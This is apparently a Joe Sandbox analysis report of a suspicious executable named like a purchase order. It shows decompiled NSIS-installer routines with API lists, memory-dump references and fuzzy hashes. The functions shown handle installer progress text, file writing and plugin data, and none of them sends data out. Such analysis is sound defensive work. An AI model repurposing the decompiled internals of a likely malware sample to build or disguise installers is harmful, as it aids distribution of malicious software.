                                                                                      					return _v24;
                                                                                      				}
                                                                                      				_t19 = GetMessagePos();
                                                                                      				_v16 = _t19 >> 0x10;
                                                                                      				_v20 = _t19;
                                                                                      				ScreenToClient(_t28,  &_v20);
                                                                                      				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                      				if((_v12 & 0x00000066) != 0) {
                                                                                      					_t15 = _v8;
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				return _t25 | 0xffffffff;
                                                                                      			}














                                                                                      0x00404f8d
                                                                                      0x00404f9a
                                                                                      0x00404fa0
                                                                                      0x00404fde
                                                                                      0x00404fde
                                                                                      0x00404fed
                                                                                      0x00404ff4
                                                                                      0x00000000
                                                                                      0x00404ff6
                                                                                      0x00404fa2
                                                                                      0x00404fb1
                                                                                      0x00404fb9
                                                                                      0x00404fbc
                                                                                      0x00404fce
                                                                                      0x00404fd4
                                                                                      0x00404fdb
                                                                                      0x00000000
                                                                                      0x00404fdb
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                      • GetMessagePos.USER32 ref: 00404FA2
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                      • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                      • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                      • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                                      				short _v132;
                                                                                      				void* _t11;
                                                                                      				WCHAR* _t19;
                                                                                      
                                                                                      				if(_a8 == 0x110) {
                                                                                      					SetTimer(_a4, 1, 0xfa, 0);
                                                                                      					_a8 = 0x113;
                                                                                      				}
                                                                                      				if(_a8 == 0x113) {
                                                                                      					_t11 = E00403012();
                                                                                      					_t19 = L"unpacking data: %d%%";
                                                                                      					if( *0x42a270 == 0) {
                                                                                      						_t19 = L"verifying installer: %d%%";
                                                                                      					}
                                                                                      					wsprintfW( &_v132, _t19, _t11);
                                                                                      					SetWindowTextW(_a4,  &_v132);
                                                                                      					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}






                                                                                      0x00402fa3
                                                                                      0x00402fb1
                                                                                      0x00402fb7
                                                                                      0x00402fb7
                                                                                      0x00402fc5
                                                                                      0x00402fc7
                                                                                      0x00402fd3
                                                                                      0x00402fd8
                                                                                      0x00402fda
                                                                                      0x00402fda
                                                                                      0x00402fe5
                                                                                      0x00402ff5
                                                                                      0x00403007
                                                                                      0x00403007
                                                                                      0x0040300f

                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                      • wsprintfW.USER32 ref: 00402FE5
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                      • API String ID: 1451636040-1158693248
                                                                                      • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                      • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                      • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                      • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
                                                                                      			E715D2655() {
                                                                                      				intOrPtr _t24;
                                                                                      				void* _t26;
                                                                                      				intOrPtr _t27;
                                                                                      				signed int _t39;
                                                                                      				void* _t40;
                                                                                      				void* _t43;
                                                                                      				intOrPtr _t44;
                                                                                      				void* _t45;
                                                                                      
                                                                                      				_t40 = E715D12BB();
                                                                                      				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                                      				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                      				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                                      				do {
                                                                                      					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                                      					}
                                                                                      					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                                      					if(_t39 <= 7) {
                                                                                      						switch( *((intOrPtr*)(_t39 * 4 +  &M715D2784))) {
                                                                                      							case 0:
                                                                                      								 *_t40 = 0;
                                                                                      								goto L17;
                                                                                      							case 1:
                                                                                      								__eax =  *__eax;
                                                                                      								if(__ecx > __ebx) {
                                                                                      									 *(__esp + 0x10) = __ecx;
                                                                                      									__ecx =  *(0x715d407c + __edx * 4);
                                                                                      									__edx =  *(__esp + 0x10);
                                                                                      									__ecx = __ecx * __edx;
                                                                                      									asm("sbb edx, edx");
                                                                                      									__edx = __edx & __ecx;
                                                                                      									__eax = __eax &  *(0x715d409c + __edx * 4);
                                                                                      								}
                                                                                      								_push(__eax);
                                                                                      								goto L15;
                                                                                      							case 2:
                                                                                      								__eax = E715D1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                      								goto L16;
                                                                                      							case 3:
                                                                                      								__ecx =  *0x715d506c;
                                                                                      								__edx = __ecx - 1;
                                                                                      								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                                      								__eax =  *0x715d506c;
                                                                                      								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                                      								goto L17;
                                                                                      							case 4:
                                                                                      								__eax = lstrcpynW(__edi,  *__eax,  *0x715d506c);
                                                                                      								goto L17;
                                                                                      							case 5:
                                                                                      								_push( *0x715d506c);
                                                                                      								_push(__edi);
                                                                                      								_push( *__eax);
                                                                                      								__imp__StringFromGUID2();
                                                                                      								goto L17;
                                                                                      							case 6:
                                                                                      								_push( *__esi);
                                                                                      								L15:
                                                                                      								__eax = wsprintfW(__edi, 0x715d5000);
                                                                                      								L16:
                                                                                      								__esp = __esp + 0xc;
                                                                                      								goto L17;
                                                                                      						}
                                                                                      					}
                                                                                      					L17:
                                                                                      					_t26 =  *(_t43 + 0x14);
                                                                                      					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                      						GlobalFree(_t26);
                                                                                      					}
                                                                                      					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                      					if(_t27 != 0) {
                                                                                      						if(_t27 != 0xffffffff) {
                                                                                      							if(_t27 > 0) {
                                                                                      								E715D1381(_t27 - 1, _t40);
                                                                                      								goto L26;
                                                                                      							}
                                                                                      						} else {
                                                                                      							E715D1312(_t40);
                                                                                      							L26:
                                                                                      						}
                                                                                      					}
                                                                                      					_t44 = _t44 - 1;
                                                                                      					_t43 = _t43 - 0x20;
                                                                                      				} while (_t44 >= 0);
                                                                                      				return GlobalFree(_t40);
                                                                                      			}











                                                                                      0x715d265f
                                                                                      0x715d2661
                                                                                      0x715d2665
                                                                                      0x715d2674
                                                                                      0x715d2678
                                                                                      0x715d267d
                                                                                      0x715d267d
                                                                                      0x715d2685
                                                                                      0x715d268c
                                                                                      0x715d2692
                                                                                      0x00000000
                                                                                      0x715d2699
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d26a1
                                                                                      0x715d26a5
                                                                                      0x715d26a8
                                                                                      0x715d26ac
                                                                                      0x715d26b3
                                                                                      0x715d26b7
                                                                                      0x715d26bd
                                                                                      0x715d26bf
                                                                                      0x715d26c1
                                                                                      0x715d26c1
                                                                                      0x715d26c8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d26d1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d26d8
                                                                                      0x715d26de
                                                                                      0x715d26e8
                                                                                      0x715d26ee
                                                                                      0x715d26f3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2714
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d26fa
                                                                                      0x715d2700
                                                                                      0x715d2701
                                                                                      0x715d2703
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d271c
                                                                                      0x715d271e
                                                                                      0x715d2724
                                                                                      0x715d272a
                                                                                      0x715d272a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2692
                                                                                      0x715d272d
                                                                                      0x715d272d
                                                                                      0x715d2732
                                                                                      0x715d2743
                                                                                      0x715d2743
                                                                                      0x715d2749
                                                                                      0x715d274e
                                                                                      0x715d2753
                                                                                      0x715d275f
                                                                                      0x715d2764
                                                                                      0x00000000
                                                                                      0x715d2769
                                                                                      0x715d2755
                                                                                      0x715d2756
                                                                                      0x715d276a
                                                                                      0x715d276a
                                                                                      0x715d2753
                                                                                      0x715d276b
                                                                                      0x715d276c
                                                                                      0x715d276f
                                                                                      0x715d2783

                                                                                      APIs
                                                                                        • Part of subcall function 715D12BB: GlobalAlloc.KERNELBASE(00000040,?,715D12DB,?,715D137F,00000019,715D11CA,-000000A0), ref: 715D12C5
                                                                                      • GlobalFree.KERNEL32(?), ref: 715D2743
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 715D2778
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42123282822.00000000715D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 715D0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42123234806.00000000715D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123363731.00000000715D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123419116.00000000715D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_715d0000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: f04b52d637599640f58780ff18a1dca9b1b1d662441f504091d0d23469905115
                                                                                      • Instruction ID: b2eb089e417c2a43fa6c8b81b1548b7dcc0022cea5ae74c9750952e2c2847689
                                                                                      • Opcode Fuzzy Hash: f04b52d637599640f58780ff18a1dca9b1b1d662441f504091d0d23469905115
                                                                                      • Instruction Fuzzy Hash: E531DE72608102EFC72F9F6AC9C4D2E7BB6FF853013264569F1D297660DB316849CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 93%
                                                                                      			E00402950(void* __ebx, void* __eflags) {
                                                                                      				WCHAR* _t26;
                                                                                      				void* _t29;
                                                                                      				long _t37;
                                                                                      				void* _t49;
                                                                                      				void* _t52;
                                                                                      				void* _t54;
                                                                                      				void* _t56;
                                                                                      				void* _t59;
                                                                                      				void* _t60;
                                                                                      				void* _t61;
                                                                                      
                                                                                      				_t49 = __ebx;
                                                                                      				_t52 = 0xfffffd66;
                                                                                      				_t26 = E00402DA6(0xfffffff0);
                                                                                      				_t55 = _t26;
                                                                                      				 *(_t61 - 0x40) = _t26;
                                                                                      				if(E00405FAE(_t26) == 0) {
                                                                                      					E00402DA6(0xffffffed);
                                                                                      				}
                                                                                      				E00406133(_t55);
                                                                                      				_t29 = E00406158(_t55, 0x40000000, 2);
                                                                                      				 *(_t61 + 8) = _t29;
                                                                                      				if(_t29 != 0xffffffff) {
                                                                                      					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                                      					if( *(_t61 - 0x28) != _t49) {
                                                                                      						_t37 =  *0x42a274;
                                                                                      						 *(_t61 - 0x44) = _t37;
                                                                                      						_t54 = GlobalAlloc(0x40, _t37);
                                                                                      						if(_t54 != _t49) {
                                                                                      							E004035F8(_t49);
                                                                                      							E004035E2(_t54,  *(_t61 - 0x44));
                                                                                      							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                                      							 *(_t61 - 0x10) = _t59;
                                                                                      							if(_t59 != _t49) {
                                                                                      								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                                      								while( *_t59 != _t49) {
                                                                                      									_t51 =  *_t59;
                                                                                      									_t60 = _t59 + 8;
                                                                                      									 *(_t61 - 0x3c) =  *_t59;
                                                                                      									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                                      									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                                      								}
                                                                                      								GlobalFree( *(_t61 - 0x10));
                                                                                      							}
                                                                                      							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                                      							GlobalFree(_t54);
                                                                                      							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                                      						}
                                                                                      					}
                                                                                      					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                                      					CloseHandle( *(_t61 + 8));
                                                                                      				}
                                                                                      				_t56 = 0xfffffff3;
                                                                                      				if(_t52 < _t49) {
                                                                                      					_t56 = 0xffffffef;
                                                                                      					DeleteFileW( *(_t61 - 0x40));
                                                                                      					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                                      				}
                                                                                      				_push(_t56);
                                                                                      				E00401423();
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                                                      				return 0;
                                                                                      			}













                                                                                      0x00402950
                                                                                      0x00402952
                                                                                      0x00402957
                                                                                      0x0040295c
                                                                                      0x0040295f
                                                                                      0x00402969
                                                                                      0x0040296d
                                                                                      0x0040296d
                                                                                      0x00402973
                                                                                      0x00402980
                                                                                      0x00402988
                                                                                      0x0040298b
                                                                                      0x00402997
                                                                                      0x0040299a
                                                                                      0x004029a0
                                                                                      0x004029ae
                                                                                      0x004029b3
                                                                                      0x004029b7
                                                                                      0x004029ba
                                                                                      0x004029c3
                                                                                      0x004029cf
                                                                                      0x004029d3
                                                                                      0x004029d6
                                                                                      0x004029e0
                                                                                      0x004029ff
                                                                                      0x004029e7
                                                                                      0x004029ec
                                                                                      0x004029f4
                                                                                      0x004029f7
                                                                                      0x004029fc
                                                                                      0x004029fc
                                                                                      0x00402a06
                                                                                      0x00402a06
                                                                                      0x00402a13
                                                                                      0x00402a19
                                                                                      0x00402a1f
                                                                                      0x00402a1f
                                                                                      0x004029b7
                                                                                      0x00402a33
                                                                                      0x00402a35
                                                                                      0x00402a35
                                                                                      0x00402a3f
                                                                                      0x00402a40
                                                                                      0x00402a44
                                                                                      0x00402a48
                                                                                      0x00402a4e
                                                                                      0x00402a4e
                                                                                      0x00402a55
                                                                                      0x004022f1
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                      • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                      • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                      • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                      • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                      				char _v68;
                                                                                      				char _v132;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t23;
                                                                                      				signed int _t24;
                                                                                      				void* _t31;
                                                                                      				void* _t33;
                                                                                      				void* _t34;
                                                                                      				void* _t44;
                                                                                      				signed int _t46;
                                                                                      				signed int _t50;
                                                                                      				signed int _t52;
                                                                                      				signed int _t53;
                                                                                      				signed int _t55;
                                                                                      
                                                                                      				_t23 = _a16;
                                                                                      				_t53 = _a12;
                                                                                      				_t44 = 0xffffffdc;
                                                                                      				if(_t23 == 0) {
                                                                                      					_push(0x14);
                                                                                      					_pop(0);
                                                                                      					_t24 = _t53;
                                                                                      					if(_t53 < 0x100000) {
                                                                                      						_push(0xa);
                                                                                      						_pop(0);
                                                                                      						_t44 = 0xffffffdd;
                                                                                      					}
                                                                                      					if(_t53 < 0x400) {
                                                                                      						_t44 = 0xffffffde;
                                                                                      					}
                                                                                      					if(_t53 < 0xffff3333) {
                                                                                      						_t52 = 0x14;
                                                                                      						asm("cdq");
                                                                                      						_t24 = 1 / _t52 + _t53;
                                                                                      					}
                                                                                      					_t25 = _t24 & 0x00ffffff;
                                                                                      					_t55 = _t24 >> 0;
                                                                                      					_t46 = 0xa;
                                                                                      					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                      				} else {
                                                                                      					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                      					_t50 = 0;
                                                                                      				}
                                                                                      				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                      				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                                                      				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                                                      				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                      				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                                                      			}



















                                                                                      0x00404e7a
                                                                                      0x00404e7f
                                                                                      0x00404e87
                                                                                      0x00404e88
                                                                                      0x00404e95
                                                                                      0x00404e9d
                                                                                      0x00404e9e
                                                                                      0x00404ea0
                                                                                      0x00404ea2
                                                                                      0x00404ea4
                                                                                      0x00404ea7
                                                                                      0x00404ea7
                                                                                      0x00404eae
                                                                                      0x00404eb4
                                                                                      0x00404eb4
                                                                                      0x00404ebb
                                                                                      0x00404ec2
                                                                                      0x00404ec5
                                                                                      0x00404ec8
                                                                                      0x00404ec8
                                                                                      0x00404ecc
                                                                                      0x00404edc
                                                                                      0x00404ede
                                                                                      0x00404ee1
                                                                                      0x00404e8a
                                                                                      0x00404e8a
                                                                                      0x00404e91
                                                                                      0x00404e91
                                                                                      0x00404ee9
                                                                                      0x00404ef4
                                                                                      0x00404f0a
                                                                                      0x00404f1b
                                                                                      0x00404f37

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                      • wsprintfW.USER32 ref: 00404F1B
                                                                                      • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$H7B
                                                                                      • API String ID: 3540041739-107966168
                                                                                      • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                      • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                      • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                      • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 85%
                                                                                      			E715D2480(void* __edx) {
                                                                                      				void* _t37;
                                                                                      				signed int _t38;
                                                                                      				void* _t39;
                                                                                      				void* _t41;
                                                                                      				signed char* _t42;
                                                                                      				signed char* _t51;
                                                                                      				void* _t52;
                                                                                      				void* _t54;
                                                                                      
                                                                                      				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                                      				while(1) {
                                                                                      					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                                      					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                                      					_t52 = _t51[0x18];
                                                                                      					if(_t52 == 0) {
                                                                                      						goto L9;
                                                                                      					}
                                                                                      					_t41 = 0x1a;
                                                                                      					if(_t52 == _t41) {
                                                                                      						goto L9;
                                                                                      					}
                                                                                      					if(_t52 != 0xffffffff) {
                                                                                      						if(_t52 <= 0 || _t52 > 0x19) {
                                                                                      							_t51[0x18] = _t41;
                                                                                      							goto L12;
                                                                                      						} else {
                                                                                      							_t37 = E715D135A(_t52 - 1);
                                                                                      							L10:
                                                                                      							goto L11;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t37 = E715D12E3();
                                                                                      						L11:
                                                                                      						_t52 = _t37;
                                                                                      						L12:
                                                                                      						_t13 =  &(_t51[8]); // 0x1020
                                                                                      						_t42 = _t13;
                                                                                      						if(_t51[4] >= 0) {
                                                                                      						}
                                                                                      						_t38 =  *_t51 & 0x000000ff;
                                                                                      						_t51[0x1c] = 0;
                                                                                      						if(_t38 > 7) {
                                                                                      							L27:
                                                                                      							_t39 = GlobalFree(_t52);
                                                                                      							if( *(_t54 + 0x10) == 0) {
                                                                                      								return _t39;
                                                                                      							}
                                                                                      							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                                      							} else {
                                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                                      							}
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							switch( *((intOrPtr*)(_t38 * 4 +  &M715D25F8))) {
                                                                                      								case 0:
                                                                                      									 *_t42 = 0;
                                                                                      									goto L27;
                                                                                      								case 1:
                                                                                      									__eax = E715D13B1(__ebp);
                                                                                      									goto L21;
                                                                                      								case 2:
                                                                                      									 *__edi = E715D13B1(__ebp);
                                                                                      									__edi[1] = __edx;
                                                                                      									goto L27;
                                                                                      								case 3:
                                                                                      									__eax = GlobalAlloc(0x40,  *0x715d506c);
                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                      									__edx = 0;
                                                                                      									 *__edi = __eax;
                                                                                      									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x715d506c, __eax,  *0x715d506c, 0, 0);
                                                                                      									goto L27;
                                                                                      								case 4:
                                                                                      									__eax = E715D12CC(__ebp);
                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                      									L21:
                                                                                      									 *__edi = __eax;
                                                                                      									goto L27;
                                                                                      								case 5:
                                                                                      									__eax = GlobalAlloc(0x40, 0x10);
                                                                                      									_push(__eax);
                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                      									_push(__ebp);
                                                                                      									 *__edi = __eax;
                                                                                      									__imp__CLSIDFromString();
                                                                                      									goto L27;
                                                                                      								case 6:
                                                                                      									if( *__ebp != __cx) {
                                                                                      										__eax = E715D13B1(__ebp);
                                                                                      										 *__ebx = __eax;
                                                                                      									}
                                                                                      									goto L27;
                                                                                      								case 7:
                                                                                      									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                                      									( *(__esi + 0x18) - 1) *  *0x715d506c =  *0x715d5074 + ( *(__esi + 0x18) - 1) *  *0x715d506c * 2 + 0x18;
                                                                                      									 *__ebx =  *0x715d5074 + ( *(__esi + 0x18) - 1) *  *0x715d506c * 2 + 0x18;
                                                                                      									asm("cdq");
                                                                                      									__eax = E715D1510(__edx,  *0x715d5074 + ( *(__esi + 0x18) - 1) *  *0x715d506c * 2 + 0x18, __edx,  *0x715d5074 + ( *(__esi + 0x18) - 1) *  *0x715d506c * 2);
                                                                                      									goto L27;
                                                                                      							}
